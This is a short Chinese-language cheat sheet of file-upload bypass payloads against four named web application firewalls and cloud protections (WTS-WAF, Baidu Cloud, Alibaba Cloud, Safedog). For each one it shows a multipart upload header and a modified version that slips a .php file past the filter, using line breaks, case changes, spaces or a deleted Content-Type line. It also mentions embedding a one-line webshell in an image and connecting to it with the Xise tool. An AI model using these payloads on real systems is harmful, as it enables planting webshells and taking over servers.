1:WTS-WAF 繞過上傳 原內容: Content-Disposition: form-data; name="up_picture"; filename="xss.php" 添加回車 Content-Disposition: form-data; name="up_picture"; filename="xss.ph p" 2:百度雲上傳繞過見下: 百度雲繞過就簡單的很多很多,在對文件名大小寫上面沒有檢測php是過了的,Php就能過,或者PHP,一句話自己合成圖片馬用Xise連接即可。 Content-Disposition: form-data; name="up_picture"; filename="xss.jpg .Php" 3:阿里雲上傳繞過見下: 源代碼: Content-Disposition: form-data; name="img_crop_file"; filename="1.jpg .Php"Content-Type: image/jpeg 修改如下: Content-Disposition: form-data; name="img_crop_file"; filename="1.php" 沒錯,將=號這里回車刪除掉Content-Type: image/jpeg即可繞過。 4:安全狗上傳繞過見下: 源代碼: Content-Disposition: form-data; name="image"; filename="085733uykwusqcs8vw8wky.png"Content-Type: image/png 繞過內容如下: Content-Disposition: form-data; name="image"; filename="085733uykwusqcs8vw8wky.png C.php" 刪除掉ontent-Type: image/jpeg只留下c,將.php加c后面即可,但是要注意額,雙引號要跟着c.php".